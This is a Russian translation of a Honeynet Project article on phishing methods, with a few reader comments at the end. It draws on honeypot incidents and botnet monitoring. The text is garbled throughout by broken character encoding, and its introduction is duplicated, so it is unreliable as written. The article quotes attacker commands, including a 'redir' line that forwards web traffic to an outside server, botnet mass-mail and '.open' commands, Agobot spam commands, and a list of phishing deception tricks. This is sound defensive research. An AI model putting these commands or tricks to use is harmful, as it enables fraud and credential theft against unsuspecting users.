28.06.2005

«най —воего ¬рага в Ћицо Ц ‘ишинг »ли „то —крываетс€ за јтаками ‘ишинга, часть 1, ћетоды ‘ишинга

‘ишинг представл€ет собой рассылку спама, причем написанного так, как будто его прислал какой-либо банк или друга€ серьезна€ организаци€ с целью выудить у получател€ чувствительную информацию (имена пользователей, пароли, акаунты IDs, ATM PINТы или информацию о кредитках). ќбычно, фишинговые атаки направл€ют получател€ на веб-страницу, спроектированную так, что она имитирует насто€щий сайт организации и собирает личную информацию, причем чаще всего пользователь даже не подозревает, что на него производилась атака такого рода. ¬ добывании такой информации больше всего заинтересованы blackhatТы, т.к. она позволит им установить личности своих жертв и произвести мошеннические финансовые транзакции. „аще всего жертвы терп€т огромные финансовые потери или кражу личных данных в криминальных цел€х. ¬ этой KYE (Know Your Enemy Ц «най —воего ¬рага) статье будет предоставлена практическа€ информаци€ о фишинге, основанна€ на данных, собранных German Honeynet Project (√ермани€) и UK Honeynet Project (¬еликобритани€). ¬ статье заостр€етс€ внимание на реальные мировые событи€, которые Honeynet Project наблюдал в живых услови€х, однако здесь не будут указаны все возможные методы фишинга. јтакующие посто€нно занимаютс€ исследовани€ми, поэтому новые методы фишинга уже сейчас наход€тс€ в стадии разработки, если не используютс€.

The Honeynet Project & Research Alliance
http://www.honeynet.org

‘ишинг представл€ет собой рассылку спама, причем написанного так, как будто его прислал какой-либо банк или друга€ серьезна€ организаци€ с целью выудить у получател€ чувствительную информацию (имена пользователей, пароли, акаунты IDs, ATM PINТы или информацию о кредитках). ќбычно, фишинговые атаки направл€ют получател€ на веб-страницу, спроектированную так, что она имитирует насто€щий сайт организации и собирает личную информацию, причем чаще всего пользователь даже не подозревает, что на него производилась атака такого рода. ¬ добывании такой информации больше всего заинтересованы blackhatТы, т.к. она позволит им установить личности своих жертв и произвести мошеннические финансовые транзакции. „аще всего жертвы терп€т огромные финансовые потери или кражу личных данных в криминальных цел€х. ¬ этой KYE (Know Your Enemy Ц «най —воего ¬рага) статье будет предоставлена практическа€ информаци€ о фишинге, основанна€ на данных, собранных German Honeynet Project (√ермани€) и UK Honeynet Project (¬еликобритани€). ¬ статье заостр€етс€ внимание на реальные мировые событи€, которые Honeynet Project наблюдал в живых услови€х, однако здесь не будут указаны все возможные методы фишинга. јтакующие посто€нно занимаютс€ исследовани€ми, поэтому новые методы фишинга уже сейчас наход€тс€ в стадии разработки, если не используютс€.

ѕосле короткого введени€ мы просмотрим актуальные методы и инструменты, используемые фишерами, включа€ примеры имперического поиска, при котором реальные фишинговые атаки были зарегистрированы при помощи honeynets. Ёти инциденты будут подробно описаны, включа€ вторжение, подготовку фишерного сайта, рассылку сообщений и сбор данных. ƒалее будут проанализированы основные методы и направлени€, включа€ растущую интеграцию фишинга, спама и ботнэтов. ¬ статье рассмотрены примеры использовани€ сборщиков почтовых адресов и программ-рассыльщиков, кроме того мы предоставим наши наблюдени€ за сканированием сети и как фейковые машины (наши же honeypots) используютс€ дл€ распространени€ фишинговых писем и другого спама. ¬ конце, мы завершим эту статью обзором знаний, полученных в последние шесть мес€цев и предложим новые идеи дл€ исследований.

«десь вы найдете много дополнительной информации с большим количеством ссылок на более подробные ресурсы отдельных тем. Ќикаких личных данных в процессе исследовани€ не собиралось. ¬ некоторых случа€х мы св€зывались с организаци€ми, замешанными в атаках или сообщали об инцидентах в местные CERT.

¬ведение

¬ыуживание чужих паролей или другой чувствительной информации имеет долгую историю среди общества взломщиков. “радиционно такие действи€ осуществл€лись при помощи социальной инженерии. ¬ 1990-ых, с ростом числа компьютеров, подключенных к сети, и попул€рностью »нтернета, атакующие научились автоматизировать этот процесс и атаковать рынок массового потреблени€. ѕервое систематизированное исследование было проведено в 1998 году (Sarah Gordon, David M. Chess: Where There's Smoke, There's Mirrors: The Truth about Trojan Horses on the Internet, представленные в Virus Bulletin Conference в √ермании г.ћюнхен, в ќкт€бре 1998). √ордон и „ес исследовали почтовые программы на AOL, однако столкнулись с фишингом вместо ожидаемых атак тро€нами. —ам термин фишинг ("password harvesting fishing" Ц ловл€ и сбор паролей) описывает мошенническое овладение чувствительной информацией, когда жертве сообщают совсем другую причину, по которой она должна сообщить эти данные, а о насто€щей цели она даже не догадываетс€. ¬от фишинговое сообщение, описанное √ордоном и „есом:

—ектор 4G9E нашей базы данных перестал выполн€ть функции ввода/вывода.  огда вы выполнили вход в систему под вашим акаунтом, мы смогли вас идентифицировать как зарегистрированного пользовател€. ѕримерно 94 секунды назад ваша верификаци€ была аннулирована из-за потери данных сектора 4G9E. —ейчас, по протоколу верификации AOL, мы об€заны создать дл€ вас акаунт заново. ѕожалуйста, нажмите Ђќтветитьї и введите ваш пароль. ¬ случае неполучени€ ответа мы полностью удалим ваш акаунт.

—начала такие атаки были главным образом нацелены на получение доступа к акаунту AOL жертвы, реже дл€ получени€ данных о кредитной карте в цел€х мошенничества (к примеру, дл€ нелегальных махинаций с этой информацией). „асто фишерные сообщени€ содержали элементарные хитрости, в результате чего компьютер жертвы оказывалс€ под контролем третьих лиц. ѕроисходило это потому, что неопытный пользователь клевал на Ђавтоматизированныеї функции формы ввода личных данных или (€вных) признаков того, что письмо пришло от авторитетного источника.  ак показано в предыдущем примере, это могла быть истори€ о нарушении работы оборудовани€ или ошибка базы данных, и большинство пользователей верили в значимость официально оформленного сообщени€ или неотложной технической просьбы, в которой требовалась помощь пользовател€. ѕользовател€м обычно напоминали, что запрошенна€ информаци€ должна быть введена немедленно, дабы избежать серьезную проблему: ЂЕи введите ваш пароль. ¬ случае неполучени€ ответа мы полностью удалим ваш акаунт.ї ¬ыгл€дит как старый анекдот, однако это происходило на самом деле, а преступники работали в одиночку или в малых, непрофессиональных группах. ¬ литературе часто рассказываетс€ о начинающих фишерах, как о подростках, желающих получить чужой акаунт в цел€х нанесени€ ущерба или дл€ звонков на дальние рассто€ни€, чаще всего с малым уровнем организации.

—егодн€ фишеры выбирают стратегию рассылки почты стольким количествам пользователей, скольким возможно, маскиру€сь под доверенный брэнд Ц обычно тот, которому жертва скорее всего уже довер€ет. «апрос на срочные действи€ уже послан, и чтобы создать видимость, что данные, посылаемые пользователем, будут в безопасности, в спуфное сообщение вписывают линк к удаленной веб-странице, дизайн которой подобран так, что почти полностью имитирует сайт реальной компании. ѕримеры компаний, брэнды которых использовались фишерами, включают в себ€ много известных банков, компаний, предоставл€ющих услуги кредитовани€ или известных платежных систем »нтернет. ћножество примеров фишерных сообщений находитс€ на сайте Anti-Phishing Working Group, в которых показаны лучшие трюки, используемые фишерами дл€ создани€ уверенности пользовател€ в том, что он действительно зашел на законный веб-интерфейс.

ѕосле короткого введени€ в принципы фишинга мы покажем существующие методы и инструменты, добытые в процессе исследовани€ реальных фишинговых атак. ≈сли вы заинтересованы в большем количестве вводной информации, мы подготовили другую статью.

»нструменты и “актика

‘ишинговые атаки обычно осуществл€ютс€ несколькими простыми инструментами и методами, позвол€ющими обмануть не о чем не подозревающих пользователей. ќсновной инфраструктурой, поддерживающей фишерные сообщени€, обычно служит HTML страница, скопированна€ на недавно порутанный сервер и серверна€ часть скриптов дл€ обработки всех данных, введенных пользователем. ћогут вовлекатьс€ и более комплексные веб-сайты и перенаправление содержани€, но в большинстве случаев цель всегда одна Ц подн€ть фейковый сервер, имитирующий работу реального брэнда, который предоставит все данные, введенные пользователем в руки злоумышленника. »спользу€ современные утилиты редактировани€ HTML, создание фейкового веб-сайта не займет много времени, и плохо защищенные веб-серверы могут быть легко запущены и взломаны в случае, если атакующий возьметс€ за сканирование диапазонов IP адресов в поисках у€звимых хостов. ќднажды порутанные, даже домашние компьютеры могут стать эффективными хостами дл€ фишерных сайтов, поэтому под прицелом наход€тс€ не только корпоративные или академические системы. јтакующие часто не делают различий между целевыми компьютерами, тупо выбира€ большие диапазоны IP адресов дл€ поиска случайных или одной конкретной у€звимости.

— момента создани€ фейкового сайта главной задачей фишера становитс€ перенаправление пользователей с легального сайта компании на фейковый сайт. ѕока фишер имеет возможность подмен€ть DNS на целевой сайт (DNS poisoning) или каким-либо другим способом перенаправл€ть сетевой трафик (метод, часто называемый pharming), они все равно должны полагатьс€ на некоторую форму хорошего уровн€ содержимого, чтобы заманить несчастного пользовател€ на фейковый сайт. „ем лучше качество приманки, тем больша€ сеть может быть раскинута и тем больше шанс невинного пользовател€ посетить фейковый сайт (и ввести данные, запрошенные фишером).

ќднако дл€ атакующего есть одна проблема Ц когда он выбрал конкретную организацию (банк или др.), у него возможно не будет никакой информации о том, кто €вл€етс€ реальным покупателем в »нтернете, что может быть особенно заметно дл€ определенных ловушек. ≈сли даже фишер запостит пару линков, ведущих на фейковый сайт в чатах и форумах, принадлежащих реальному брэнду (сайт технической поддержки или группы по св€з€м с общественностью), велика веро€тность что реальна€ организаци€ будет быстро информирована, а неправильные ссылки будут удалены или подвергнуты сомнению до того, как достаточное число пользователей посет€т фейковый контент и пришлют личные данные. “акже существует существенный риск, что реальна€ организаци€ может зафиксировать и отключить фейковый сайт. —ледовательно, фишеру требуетс€ метод достижени€ максимального количества потенциальных жертв с минимумом риска, плюс идеальный партнер в цел€х спама по email.

” спамеров имеютс€ в наличии базы данных с миллионами рабочих email адресов, таким образом, массовые методы рассылки могут быть использованы фишером дл€ рассылки приманок очень многим юзерам с малым риском. —памные сообщени€ чаще всего посылаютс€ через хакнутые серверы в забугорных странах, или через глобальные сети PC-зомби (ботнэты), таким образом, реальное местоположение фишера определить в принципе невозможно. ≈сли не о чем не подозревающий юзер получает официально оформленное сообщение, причем, похоже, что его отправил банк и просит пользовател€ перейти по ссылке, содержимое которой будет максимально походить на реальный сайт банка. ƒалее юзера прос€т помен€ть пароль дл€ онлайновых операций в цел€х безопасности, и веро€тность, что он сделает это, велика, если у него в почтовом €щике находитс€ прилична€ куча другого спама с предложени€ми купить какой-либо новый товар и ссылками на неизвестные сайты. ƒл€ увеличени€ видимости того, что сообщение подлинное, фишер может воспользоватьс€ некоторыми методами дл€ улучшени€ изощренности попыток жульничества:

  • »спользование IP адресов вместо доменных имен в ссылках на фейковый веб сайт. ћногие пользователи не будут провер€ть (или не будут знать как проверить) принадлежит ли IP адрес реальному хосту организации.
  • –егистрирование созвучных DNS доменов (к примеру, b1gbank.com or bigbnk.com).
  • ¬ставка ссылок из реального сайта компании в сообщение о фишерном сайте таким образом, что браузер пользовател€ выполнит большинство соединений на реальный сайт и минимум из них Ц на фейковый. ≈сли email клиент юзера поддерживает авто-рендер содержани€, то клиент попытаетс€ соединитьс€ автоматически на фейковый сайт как только будет прочитано сообщение, а браузер с ручным управлением может и не заметить небольшое число соединений на злой сервер среди основной части соединений на подлинный сервер.
  •  одирование линка в браузере. ќдним из вариантов этого метода может быть IDN spoofing с использованием Unicode. Ѕудет казатьс€, что линк ведет на подлинный сайт, однако фактически соединение пойдет на фейковый сервер с другим адресом.
  • ћожно попробовать использовать у€звимости в веб-браузере пользовател€ дл€ скрыти€ действительной сущности содержани€ сообщени€. ѕриложени€ Microsoft Internet Explorer и Outlook имеют множество дырок (такие как address bar spoofing или IFrame element)
  •  онфигурирование фишерного сайта так, чтобы записывались любые введенные данные (имена пользователей и пароли), причем скрытно, а затем направл€ть пользовател€ на реальный сайт. ћожно выдать сообщение Ђпароль неверныйї, после чего пользователь вообще не заподозрит неладного и тупо введет все данные снова.
  • ¬полне осуществимо запустить фейковый сайт в роли прокси-сервера дл€ реального сайта, полностью журналиру€ все данные, незашифрованные SSL (или даже регистриру€ валидные SSL сертификаты дл€ спуфных доменов)
  • ѕеренаправление жертв на фишерный сайт, использу€ malware дл€ установки злоумышленного Browser Helper Object на локальный компьютер. BHO это DLLТки, созданные дл€ контрол€ браузера Internet Explorer, и если они выполн€ютс€ успешно, жертва может быть обманута, т.к. будет думать, что находитс€ на реальном сайте, а на самом деле будет на фейковом.
  • »спользование malware дл€ правки файла hosts на PC жертвы, который используетс€ дл€ хранени€ соответствий между DNS и IP адресами. ѕутем вставки фейкового DNS в этот файл можно заставить браузер жертвы соедин€тьс€ на нелегальный сервер.

Ѕлагодар€ комплексной природе многих приложений электронной коммерции или онлайновых банков, которые чаще всего используют HTML фреймы и саб-фреймы или другие структуры комплексных страниц, пользователю будет трудно определить €вл€етс€ ли определенна€ страница законной. »спользование методов, указанных выше, может скрыть исходник страницы, а пользователь будет легко обманут. — этого момента фишер сможет свободно использовать акаунты пользовател€ или другие электронные идентификаторы, а пользователь становитс€ другой жертвой успешной фишерной атаки.

–еальные ћетоды ћирового ‘ишинга

„аще всего пользователи »нтернет узнают о фишинговых атаках после получени€ спуфного почтового сообщени€ или просмотра копии фейкового веб-сайта под заголовками сайта новостей. ѕричем публикаци€ в новост€х по€вилась далеко не сразу после ликвидации левого хоста. Ёти событи€ очень редко разглашают, поэтому информаци€ об атаках вр€дли дойдет до жертвы. ќдно из основных преимуществ honeynets состоит в том, что мы можем наблюдать за атакой с ракурса самого атакующего, а не жертвы, что позвол€ет составить четкое представление о технике атаки. ”частникам Honeynet Project's Research Alliance удалось собрать достаточно информации, иллюстрирующей этапы фишинговых атак, начина€ от начального взлома и подн€ти€ фейковго сайта до массовой рассылки почты и захват данных пользовател€. Ќиже будут представлены несколько примеров типичных реальных фишинговых методов.

ћетод ‘ишинга 1 Ц„ерез ѕорутанные ¬еб-серверы

Ѕольшинство фишинговых атак, рассмотренных нами в реальных услови€х, были осуществелны злоумышленниками, которые вторгались на у€звимые серверы, а затем устанавливали фейковый веб-контент. Ќам удалось установить примерную последовательность действий фишера:

  • «лоумышленник сканирует сеть на наличие у€звимых серверов
  • —ервер порутан и установлен руткит или бэкдор с паролем
  • ‘ишеры получают доступ к серверу через зашифрованный бэкдор
  • ≈сли порутанный сервер €вл€етс€ веб-сервером, то заранее созданный сайт заливаетс€ на сервер
  • ћинимальна€ настройка и тест веб-сайта (потенциально открывающий реальный IP адрес ‘ишера после первого обращени€ к веб-серверу)
  • «акачиваютс€ и используютс€ средства массовой рассылки писем дл€ рекламы фейкового сайта через спам
  • ¬еб трафик начинает поступать на фишинговый сайт, по€вл€ютс€ первые потенциальные жертвы

„асто врем€, затрачиваемое на все эти процессы занимает пару часов или дней с момента первого подключени€ системы к »нтернет, и мы догадываемс€ что такие действи€ разворачиваютс€ на нескольких серверах и нацелены на несколько организаций сразу. ћы продемонстрируем эти теории на практике, основыва€сь на одном из инцидентов, наблюдаемых в German Honeynet Project (ѕроект Honeynet - √ермани€) и еще одном, замеченным в UK Honeynet Project (ѕроект Honeynet - ¬еликобритани€). ¬ каждом случае были развернуты у€звимые Linux honeypots. ѕоследующий анализ обоих honeypot показала похожие принципы действий: у€звимые honeypots были обнаружены в процессе сканировани€ и довольно быстро взломаны, включа€ заливку заранее спроектированных фейковых сайтов и закачку утилит массовой рассылки. “акже во врем€ атак были подн€ты руткиты и IRC серверы. ѕорутанные honeypots также использовались дл€ целей, отличных от фишинга: IRC бот –умынских хакеров и сканер дл€ развертывани€ и атаки дополнительных у€звимых компьютеров (как бы то ни было, архитектура honeynet не позвол€ла атакующим эксплуатировать другие серверы из уже захваченных honeypot). Ѕыли обнаружены некоторые интересные различи€, но анализ получилс€ слишком запутанный, так как в инциденте в ¬еликобритании honeypotТом пользовались сразу несколько групп. „тобы сократить объем этой статьи мы не стали включать в неЄ тонкости специфических атак, а только охватили полученные знани€ и то, как они используютс€ в фишинге. ƒл€ более подробного изучени€ специфических атак доступна следующа€ информаци€:

Ёта таблица содержит сводку ключевых факторов и различий инцидентов:

ƒанные »нцидент в √ермании »нцидент в ¬еликобритании
ѕорутанный honeypot Redhat Linux 7.1 x86. Redhat Linux 7.3 x86.
ћестоположение  орпоративна€ сеть √ермании. ÷ентр данных ISP ¬еликобритании.
ћетод атаки јвторутер "Superwu". ћассовый сканер "Mole".
»спользованн€ у€звимость Wu-Ftpd File globbing heap corruption vulnerability (CVE-2001-0550). NETBIOS SMB trans2open buffer overflow (CAN-2003-0201).
ѕолученный уровень доступа Root. Root.
”становленный рукит Simple rootkit, который бэкдорит некоторые бинарники. SHV4 rootkit.
¬озможные злоумышленники Ќеизвестны. Ѕольшие группы с диапозонов кабельных IP региона  онстанта –умынии.
ƒействи€ веб-сайта  омплексные заранее спланированные фейковые сайты скачены, цель - eBay и известные банки —Ўј. «аранее спланированные фейковые сайты скачены, цель Ц известный банк —Ўј.
ѕроцессы серверной стороны PHP script дл€ утверждени€ введенных данных. PHP script с продвинутым утверждением введенных данных и их последующей сортировкой.
ƒействи€ Email ѕопытка посылки спама (пример 1, пример 2), однако блокировано Honeywall. ѕосланы только тестовые послани€ возможно фишерам из команды. »справлен синтаксис и представление данных.
ћетод массовой рассылки ќсновной PHP скрипт с небольшим списком почтовых адерсов. ќсновной PHP скрипт с малым списком почтовых адресов Ц возможно только тестовый.
“рафик фертвы, достигший honeypot. ќтсутствует, рассылка спама и доступ к фейковому сайту закрыт. ѕрисутствует. 265 HTTP запросов за 4 дн€, не €вл€ющихс€ следствием спама, посланного с сервера (никаких данных не было введено).

»з наблюдени€ нажатий клавиш фишера в обоих инцидентах (перехвачено с помощью Sebek), €сно, что нападающие подключались к заранее подготовленным бэкдорам и немедленно приступали к развертыванию фишерных сайтов. јтакующие оказались знакомы со средой сервера, что наводит на мысль о том, что они состо€ли в группе тех, кто взламывал honeypotТы и что попытка фишинга была организована на уровне. “ак как залитый веб контент часто ссылалс€ на другие веб серверы и IP адреса, вполне веро€тно, что действи€ были направлены сразу на несколько серверов.

јнализ контента фишерного сайта показал, что злоумышленники нацеливались сразу на несколько известных онлайновых фирм. ’орошо построенные и официально оформленные, фейковые сайты повседневно заливаютс€ на порутанные серверы Ц часто нацеленные на несколько организаций через отдельные Ђмикро сайтыї, с разными рутами веб-сервера и необходимыми утилитами посылки спама потенциальным жертвам. » так, фейковый сайт подн€т и находитс€ в боевой готовности. Ћистинги директорий просматривались в процессе FTP сессий, что также подтверждает что атакующие сильно увлеклись спамом и фишингом. ќсмотр веб контента и средств доставки сообщений, хран€щихс€ на центральном сервере, показал, что злоумышленники намеревались атаковать eBay, AOL и несколько известных банков —Ўј (в случае инцидента в ¬еликобритании). “акие индивидуальные атаки навр€дли остаютс€ изолированными событи€ми, ведь спам, посылавшийс€ во врем€ инцидентов, направл€л жертв не только на взломанный honeypot. Ёто показывает, что фишеры примен€ют множество фейковых веб-серверов и посылают спам сразу с нескольких систем. ѕараллельные фишинговые операции были замечены по времени первого вход€щего HTTP запроса на фишинговый контент после того, как honeypot ¬еликобритании был порутан:

2004-07-23 21:23:14.118902 XXX.XXX.XXX.XXX -> 10.2.2.120 
HTTP GET /.internetBankingLogon HTTP/1.1

Ётот вход€щий HTTP запрос к honeypot по€вилс€ до того, как атакующие закончили установку фейкового онлайнового банка на honeypot, и подтверждает предположение о том, что атакующий прекрасно знал что этот сервер можно было использовать дл€ фишинга. —пам с рекламой фейкового сайта уже был в процессе рассылки с другого хоста, в тот момент, когда злоумышленник поднимал веб-сайт.

ћы были удивлены, когда увидели количество IP адресов, с которых шли вход€щие HTTP запросы. ƒиаграмма, представленна€ ниже, показывает число одиночных и повтор€ющихс€ HTTP запросов с индивидуальных IP адресов на фишерный сайт в ¬еликобритании до того, как honeypot был отключен в цел€х защиты пользователей (а детали инцидента были сообщены банку, на который производилась атака):

—писок DNS доменов, стран и операционных систем, посещающих фишинговый контент honeypot ¬еликобритании можно посмотреть здесь. ќтметим, что до того как honeypot уронили, ни один запрос вида HTTP POST к PHP скрипту, обрабатывающему пользовательские данные, не был разрешен, и никакие пользовательские данные не были раскрыты. ¬о всех инцидентах, рассмотренных в этой статье, были информированы как организаци€, на которую нацеливалась атака, так и местные CERT. ¬о всех случа€х никакие данные, за которыми охотились фишеры, не были получены участниками Honeynet Project или Research Alliance.

ƒанные, полученные в ходе анализа этих двух инцидентов, показали, что фишеры активны и хорошо организованы, быстро ориентируютс€ в порутанных компьютерных системах и одновременно атакуют несколько известных организаций. ѕосто€нно происходит так, что в число пользователей email вход€т банки и олайн магазины, поэтому они тоже рискуют стать жертвами фишинга.

ћетод ‘ишинга 2 Ц „ерез ѕеренаправление ѕортов

¬ но€бре 2004 года Honeynet Project в √ермании запустил классическую GenII honeynet с honeypot Redhat Linux 7.3. Ќесмотр€ на то, что это довольно старый релиз системы и вл€етс€ легкой добычей дл€ взломщиков, прошло 2,5 мес€ца, прежде чем honeypot был взломан Ц ощутима€ разница по сравнению с инцидентами, рассмотренными выше. Ѕольше информации об этой тенденции доступно в предыдущей KYE статье ЂKnow your Enemy: Trendsї

11 €нвар€ 2005 года злоумышленнику удалось захватить honeypot, использу€ сплойт OpenSSL SSLv2 Malformed Client Key Remote Buffer Overflow Vulnerability. Ётот инцидент необычен тем, что никакого фишингового контента не было залито напр€мую. ¬место этого хакер установил и настроил службу перенаправлени€.

Ёта служба выполн€ла перенаправление HTTP запросов, посланных на веб сервер honeypot, на другой удаленный сервер в открытом виде, что усложн€ло поиск насто€щего расположени€ контента. ѕеренаправление осуществл€лось на веб сервер в  итае. «анимательно то, что злоумышленник не потрудилс€ поставить руткит, чтобы скрыть своЄ присутствие в honeypot, что наводит на мысль о том, что атакующий особо не ценил порутанный сервер, а команда особа не бо€лась быть разоблаченной.

 оманда, использовавша€с€ атакующим дл€ перенаправлени€ была следующего вида:

redir --lport=80 --laddr=< honeypot IP> --cport=80 --caddr=221.4.XXX.XXX

  тому же, фишер модифицировал файл автозагрузки Linux /etc/rc.d/rc.local дл€ подстраховки, того что служба перенаправлени€ будет запущена в случае перезагрузки системы honeypot, тем самым изменив шансы службы остатьс€ на системе. ƒалее они начали спамить, примеры сообщений можно найти здесь (значима€ информаци€ была исключена).

ƒл€ дальнейшего расследовани€ действий фишера участники Honeynet Project √ермании вмешались и скрытно изменили настройки службы перенаправлени€, установленной на honeypot, сделав доступной запись логов, чтобы проще узнать сколько пользователей получили спам и кликнули по ссылке, в последствии перенаправл€ющей их Ђв  итайї. ¬ течение примерно 36 часов 721 IP адрес был перенаправлен, и мы снова были удивлены количеством пользователей, поддавшихс€ обману. јнализ IP адресов, посетивших перенаправленный порт можно увидеть здесь (в процессе собирани€ логов были записаны только IP адерса. Ќикаких личных данных не собиралось).

Ќиже представлено краткое описание атаки по времени:

ƒата / ¬рем€ —обытие
1 но€бр€ 2004 ѕервое исследование данных на honeypot
11 €нвар€ 2005 - 19:13 »спользована у€звимость службы OpenSSL, установлен а служба перенаправлени€ порта и разослан spam
11 €нвар€ 2005 - 20:07 ¬еб запросы на фишерный контент начинают поступать на honeypot
13 €нвар€ 2005 - 8:15 Honeypot отключен от сети в цел€х судебного анализа
 

ћетод ‘ишинга 3 Ц — »спользованием ботнэтов

Ѕотнэт Ц сеть хакнутых компьютеров, управл€ема€ удаленным узлом атакующего. ¬ св€зи с их огрмными размерами (дес€тки тыс€ч систем могут быть взаимосв€заны), ботнэты представл€ют серьезную угрозу дл€ общества, когда примен€етс€ атака типа Ђќтказ в обслуживанииї (Denial-of-Service - DoS). ѕоверхностное исследование этой области показало, что ботнэты могут использоватьс€ дл€ массовой рассылки спама, то есть в цел€х фишинга. ¬о врем€ обучени€ в окт€бре 2004 года компани€ по защите почтовых сообщений CipherTrust выдвинула теорию, что 70% промониторенного фишерного спама посылалось с одного из п€ти активных ботнэтов, но мы уверенны, что на самом деле Ђживыхї ботнэтов дл€ спама используетс€ намного больше.  ак бы то ни было, мы представл€ем наши аналитические данные не на основе одного инцидента, а основыва€сь на инструментах и методах, использовавшимис€ злоумышленниками в процессе фишинга через ботнэты.

—обыти€ по ¬ремени

¬ период между сент€брем 2004 года и €нварем 2005 Honeynet Project √ермании подн€л несколько honeypot на базе Microsoft Windows дл€ наблюдени€ за активностью ботнэта. “акже была запущена служба, позвол€юща€ honeypotТам поочередно выходить в он-лайн, быть взломанными и отключенными дл€ ведени€ экспертизы. «а это врем€ было исследовано более 100 отдельных ботнэтов и тыс€чи файлов были перехвачены дл€ офф-лайн анализа.

јнализ

Ќекоторые версии бот-софта, перехваченные во врем€ исследовани€, обеспечивали возможность использовать прокс на SOCKS v4/v5 на взломанной машине. SOCKSТы Ц настраиваемый механизм дл€ приложений на базе стека протоколов TCP/IP (RFC 1928) и могут быть использованы дл€ прокса попул€рного трафика »нтернет, например HTTP и SMTP. ѕолучаетс€, что если атакующий заюзает SOCKSТы в ботнете, то он сможет послать кучу спама, причем использоватьс€ широкие диапазоны IP адресов, используемых не о чем не подозревающими пользовател€ми.

ќтсутствие центральной точки контакта и р€да интернациональных границ может сделать очень трудным или невозможным остановку такой де€тельности. ѕри этом сами спамеры и фишеры рискуют совсем мало, а прибыль имеют очень даже ощктимую. Ќеудивительно, что владельцы больших ботнэтов уже начали криминальную активность Ц сейчас возможно сдать ботнэт в аренду! «а определенную плату оператор ботнэта предоставит покупателю список хостов и портов с запущенными SOCKS v4. »меютс€ документальные подтверждени€ таких случаев: "Uncovered: Trojans as Spam Robots" (Ђ¬ открытую: “ро€ны как роботы дл€ спамаї). Ќекоторые перехваченные софтины также осуществл€ли функцию добывани€ почтовых адресов или посылки спама через ботов. —ледующий листинг показывает некоторые команды, относ€щиес€ к посылке спама, осуществленной в Agobot, попул€рном боте, использующимс€ взломщиками (и частенько перехвачиваемый нами):

  • harvest.emails - "бот начинает собирать список почтовых адресов"
  • harvest.emailshttp - "бот будет собирать список почтовых адресов через HTTP"
  • spam.setlist - "загрузка списка почтовых €щиков"
  • spam.settemplate - "загрузка шаблона €щиков "
  • spam.start - "старт спама"
  • spam.stop - "остановка спама"
  • aolspam.setlist - "AOL Ц загрузка списка €щиков"
  • aolspam.settemplate - "AOL Ц загрузка шаблона"
  • aolspam.setuser - "AOL Ц установка имени пользовател€"
  • aolspam.setpass - "AOL Ц установка парол€"
  • aolspam.start - "AOL Ц старт спама"
  • aolspam.stop - "AOL Ц конец спама"

Ѕолее подробна€ информаци€ о том, как эти команды могут быть использованы, может быть найдена здесь в разделе комментариев исходника ботов. — помощью drone, модифицированного IRC клиента, разработанного Honeynet Project √ермании, нам удалось получить больше данных о том, как боты используютс€ дл€ спама/фишинга при помощи впаривани€ фейкового IRC клиента в ботнет с использованием данных соединени€, собранных при атаке на наши honeynet. Ќесколько типичных примеров такой активности показано ниже.

ѕример 1

¬ пределах одного ботнэта мы наблюдали как атакующий примен€л следующую команду (ссылки были изменены):

<St0n3y> .mm http://www.blablabla.com/email/fetch.php?
4a005aec5d7dbe3b01c75aab2b1c9991 
http://www.foobar.net/pay.html Joe did_u_send_me_this 

 оманда .mm ("mass emailing" Ц массова€ рассылка) это модернизированна€ верси€ команды spam.start. ќни принимает четыре параметра:

  1. Ћинк к файлу, содержащему несколько почтовых адресов.
  2. ¬еб страница, на которую нацелено спамное сообщение Ц может быть обычна€ страница спама или фишинговый сайт.
  3. »м€ отправител€.
  4. “ема сообщени€.

¬ этом случае скрипт fetch.php возвращал 30 разных почтовых адресов каждый раз, когда шел запрос.  аждому из этих получателей было отправлено сообщение, в котором предлагалось перейти по ссылке, указанной во втором параметре команды. ¬ данном примере ссылка вела на веб-страницу, котора€ пыталась установть элемент управлени€ ActiveX на машину жертвы.

ѕример 2

¬ другом ботнэте мы наблюдали установку Browser Helper Objects на ѕ  жертвы:

[TOPIC] #spam9 :.open http://amateur.example.com/l33tag3/beta.html -s 

 оманды .open дают команду каждому боту открыть запрошенную веб страницу и вывести еЄ на первый план. ¬ этом случае веб страница содержала Browser Helper Object (BHO), который мог попытатьс€ установить себ€ на компьютер жертвы. —уд€ по названию канала, этот ботнэт также использовалс€ дл€ посылки спама.

ѕример 3

¬ другом ботнэте мы наблюдали примеры впаривани€ шпионских закладок:

http://public.example.com/prompt.php?h=6d799fbeef3a9b386587f5f7b37f[...] 

Ёта ссылка была найдена в процессе анализа перехваченного malware. ќна направл€ет жертву на веб страницу компании, котора€ предлагает "свободное программное обеспечение рекламной поставки, которое обеспечивает нацеленную рекламу предложений". —айт содержит несколько страниц, пытающихс€ установить клиенту компонент ActiveX, по-видимому adware or spyware.

ѕродолжение следует...

или введите им€

CAPTCHA
»ван
10-11-2009 18:24:58
ќчень познавательна€ стать€. —пасибо
0 |
Aleks
12-02-2011 03:58:50
—пасибо!
0 |
—тудент
03-03-2011 01:29:53
ƒовольна интересна€ стать€. Ќикто не в курсе, где можно найти примеры фишинг-писем на русском €зыке? ∆елательно около сотни примеров - дл€ статистического анализа.
0 |